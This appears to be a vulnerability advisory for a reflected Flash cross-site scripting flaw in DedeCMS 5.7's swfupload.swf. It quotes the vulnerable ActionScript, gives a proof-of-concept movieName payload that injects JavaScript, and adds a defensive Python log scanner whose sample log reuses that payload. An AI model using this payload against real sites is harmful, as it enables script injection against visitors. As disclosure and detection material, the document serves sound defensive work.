DedeCMS 5.7 /images/swfupload/swfupload.swf cross-site scripting vulnerability

Vulnerability details

Affected file: images/swfupload/swfupload.swf

Offending source code (ActionScript, from the SWFUpload component bundled with DedeCMS):

// Get the movie name
this.movieName = root.loaderInfo.parameters.movieName;

// Configure the callbacks
// The JavaScript tracks all the instances of SWFUpload on a page.  We can access the instance
// associated with this SWF file using the movieName.  Each callback is accessible by making
// a call directly to it on our instance.  There is no error handling for undefined callback functions.
// A developer would have to deliberately remove the default functions, set the variable to null, or remove
// it from the init function.
this.flashReady_Callback         = "SWFUpload.instances[\"" + this.movieName + "\"].flashReady";
this.fileDialogStart_Callback    = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogStart";
this.fileQueued_Callback         = "SWFUpload.instances[\"" + this.movieName + "\"].fileQueued";
this.fileQueueError_Callback     = "SWFUpload.instances[\"" + this.movieName + "\"].fileQueueError";
this.fileDialogComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogComplete";
this.uploadStart_Callback        = "SWFUpload.instances[\"" + this.movieName + "\"].uploadStart";
this.uploadProgress_Callback     = "SWFUpload.instances[\"" + this.movieName + "\"].uploadProgress";
this.uploadError_Callback        = "SWFUpload.instances[\"" + this.movieName + "\"].uploadError";
this.uploadSuccess_Callback      = "SWFUpload.instances[\"" + this.movieName + "\"].uploadSuccess";
this.uploadComplete_Callback     = "SWFUpload.instances[\"" + this.movieName + "\"].uploadComplete";
this.debug_Callback              = "SWFUpload.instances[\"" + this.movieName + "\"].debug";
this.testExternalInterface_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].testExternalInterface";
this.cleanUp_Callback            = "SWFUpload.instances[\"" + this.movieName + "\"].cleanUp";
this.buttonAction_Callback       = "SWFUpload.instances[\"" + this.movieName + "\"].buttonAction";

Each of these strings is later passed as the first argument to ExternalInterface.call, which executes it as JavaScript in the hosting page. Because movieName comes from user input (a Flash parameter) and the SWF can be loaded directly with that parameter in the URL, the value is never validated before being concatenated into the callback string, which yields a reflected Flash XSS.

1. Request the SWF affected by the Flash XSS with the payload appended:

?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22bug1024%22%29}}//
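As an added example (not part of the original advisory), a Python scanner over constructed web-server access-log lines that flags requests for swfupload.swf whose movieName, once percent-decoded, contains anything beyond the letters, digits and underscores that SWFUpload's own JavaScript generates (names such as SWFUpload_0). The log lines, timestamps and 203.0.113.x client addresses are constructed; the second line reuses the PoC query string from this advisory.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in combined-log style. The second line carries the
# PoC query string from this advisory; the others are benign SWFUpload traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2012:12:00:01 +0800] "GET /dedecms/uploads/images/swfupload/swfupload.swf?movieName=SWFUpload_0 HTTP/1.1" 200 12345
203.0.113.9 - - [10/Oct/2012:12:00:07 +0800] "GET /dedecms/uploads/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22bug1024%22%29}}// HTTP/1.1" 200 12345
203.0.113.5 - - [10/Oct/2012:12:00:09 +0800] "GET /dedecms/uploads/images/swfupload/swfupload.swf HTTP/1.1" 200 12345
203.0.113.7 - - [10/Oct/2012:12:00:11 +0800] "POST /dedecms/uploads/include/dialog/select_images_post.php HTTP/1.1" 200 321
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# SWFUpload's own JavaScript assigns names like "SWFUpload_0"; anything outside
# this alphabet can close the quote in the generated callback string.
SAFE_MOVIENAME = re.compile(r"^[A-Za-z0-9_]+$")


def suspicious_movie_name(target: str) -> Optional[str]:
    """Return the decoded movieName if the request hits swfupload.swf with an unsafe value."""
    parts = urlsplit(target)
    if not parts.path.endswith("/images/swfupload/swfupload.swf"):
        return None
    # Split the query by hand so a ';' inside the value is never treated as a separator.
    for pair in parts.query.split("&"):
        key, _, raw = pair.partition("=")
        if key == "movieName":
            decoded = unquote_plus(raw)
            if not SAFE_MOVIENAME.match(decoded):
                return decoded
    return None


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, decoded movieName) for every flagged request line."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_movie_name(match.group("target"))
        if bad is not None:
            findings.append((line.split()[0], bad))
    return findings


if __name__ == "__main__":
    for ip, value in scan_log(SAMPLE_LOG):
        print(f"{ip} requested swfupload.swf with movieName={value!r}")
```

The same allow-list check is the mitigation on the SWF side: reject a movieName that does not match the alphabet before it is concatenated into any ExternalInterface.call string.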